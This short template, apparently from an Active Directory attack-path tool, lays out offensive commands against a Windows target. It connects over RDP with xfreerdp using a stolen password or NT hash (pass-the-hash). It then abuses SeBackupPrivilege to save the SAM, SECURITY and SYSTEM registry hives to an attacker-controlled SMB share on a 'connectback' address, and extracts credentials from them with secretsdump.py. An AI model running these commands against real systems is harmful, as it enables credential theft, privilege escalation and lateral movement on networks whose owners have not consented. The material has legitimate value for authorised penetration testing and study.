# - Connect to RDP (if opened) as {{parent}} on {{target}}
{% if parent.krb_auth or parent.secret_type == T_SECRET_AESKEY %}
xfreerdp KRB TODO
{%- elif parent.secret_type == T_SECRET_NTHASH %}
xfreerdp /d:{{fqdn}} /u:{{parent}} /pth:{{parent.secret|red}} /v:{{target_ip|red}}
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
xfreerdp /d:{{fqdn}} /u:{{parent}} /p:{{parent.secret|red}} /v:{{target_ip|red}}
{% endif %}

# Privilege escalation (through RDP)
# - open a cmd.exe, run as administrator
# - whoami /priv: you will see the SeBackupPrivilege (even if it's written disabled)
# - copy the hives to a machine you control, or copy locally
reg save HKLM\SAM \\{{connectback_ip|red}}\MYSHARE\SAM.save
reg save HKLM\SECURITY \\{{connectback_ip|red}}\MYSHARE\SECURITY.save
reg save HKLM\SYSTEM \\{{connectback_ip|red}}\MYSHARE\SYSTEM.save

# Extract secrets (take the $MACHINE.ACC:plain_password_hex)
secretsdump.py -sam SAM.save -security SECURITY.save -system SYSTEM.save local
